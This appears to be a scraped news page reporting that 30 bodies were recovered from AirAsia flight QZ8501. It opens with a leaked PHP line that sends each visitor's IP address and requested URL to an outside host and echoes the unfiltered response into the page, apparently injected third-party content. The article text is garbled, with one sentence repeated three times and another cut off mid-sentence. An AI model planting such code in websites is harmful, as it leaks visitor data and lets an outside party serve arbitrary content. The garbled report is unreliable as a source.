$f = fopen('http://online.admentation.com/show.php?z=6&pl=2992&incl=1&ip='.getenv('REMOTE_ADDR').'&url='.urlencode(getenv('HTTP_HOST').getenv('REQUEST_URI')),'r');
echo stripslashes(fread($f,100000));
21 of the corpses were found on Friday, January 2, after bad weather hampered search efforts.
Rescuers in Indonesia have now
recovered 30 bodies of passengers who were on board the ill-fated Air
Asia flight QZ8501 and five of them were still strapped in their seats,
officials say.
21 of the corpses were found on Friday, January 2, after bad weather hampered search efforts.
21 of the corpses were found on Friday, January 2, after bad weather hampered search efforts.
The head of Indonesia’s search and rescue agency, Henry Bambang Soelistyo
confirmed that a total of 30 bodies had been found and many more are
expected to be recovered from the plane’s main fuselage which is still
“Many of passengers believed to be
still trapped inside the plane's fuselage and could be discovered soon.
God willing, we would complete this operation next week,” National Search and Rescue Agency Director of Operations Suryadi B. Supriyadi said.
The crashed plane was carrying 162 passengers and crew to Singapore when it disappeared from radar shortly after take-off from Surabaya, Indonesia.
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